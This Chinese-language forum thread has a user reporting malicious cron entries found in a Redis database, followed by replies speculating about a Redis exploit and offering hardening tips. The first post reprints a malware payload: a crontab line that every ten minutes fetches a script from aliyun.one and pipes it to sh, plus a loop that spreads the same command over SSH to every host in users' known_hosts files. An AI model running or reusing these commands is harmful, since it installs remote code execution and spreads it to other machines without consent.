发现一个有意思域名,http://aliyun.one/，打开一看更不得了

龙腾宇内 · 发表于 2019-12-3 16:21:12

今天整理redis数据库的时候，突然发现一些可疑的数据，就打开看了下。
是一对定时任务的数据，都是定时访问一个网址
aliyun.one

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh"|crontab - cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/* do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh >/dev/null 2>&1 &" & done fi fi done #

复制代码

大家可以看看，感觉很6.哈哈

shenyina · 发表于 2019-12-3 16:27:16

这个域名打不开，不过有谷歌快照
这个定时任务干啥用

一位不知名网友 · 发表于 2019-12-3 16:27:23

提示: 作者被禁止或删除内容自动屏蔽

microlz · 发表于 2019-12-3 16:34:29

redis漏洞吧

龙腾宇内 · 发表于 2019-12-3 16:36:02

shenyina 发表于 2019-12-3 16:27
这个域名打不开，不过有谷歌快照
这个定时任务干啥用

修改你的登录秘钥

龙腾宇内 · 发表于 2019-12-3 16:37:13

microlz 发表于 2019-12-3 16:34
redis漏洞吧

不好说，我这是在办公电脑上发现的

ailaotan · 发表于 2019-12-3 16:39:16

牛皮，代码的意思好像是把他的公钥写入你的服务器，然后他就能用密钥登录了

妖言惑众 · 发表于 2019-12-3 16:41:14

白票加头盔

ailaotan · 发表于 2019-12-3 16:45:29

redis一般不要开放外网，本身redis性能很高，官方建议如果开外网，设置密码都尽可能长，并且不要用6379默认端口

龙腾宇内 · 发表于 2019-12-3 16:48:51

ailaotan 发表于 2019-12-3 16:45
redis一般不要开放外网，本身redis性能很高，官方建议如果开外网，设置密码都尽可能长，并且不要用6379默认 ...

我就很郁闷，我那就是个测试服务器，啥都没安装。不知道是如何被入侵的

		自动登录	找回密码
密码			注册

一位不知名网友一位不知名网友当前离线积分 3898	发表于 2019-12-3 16:27:23 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
一位不知名网友一位不知名网友当前离线积分 3898
	回复支持反对举报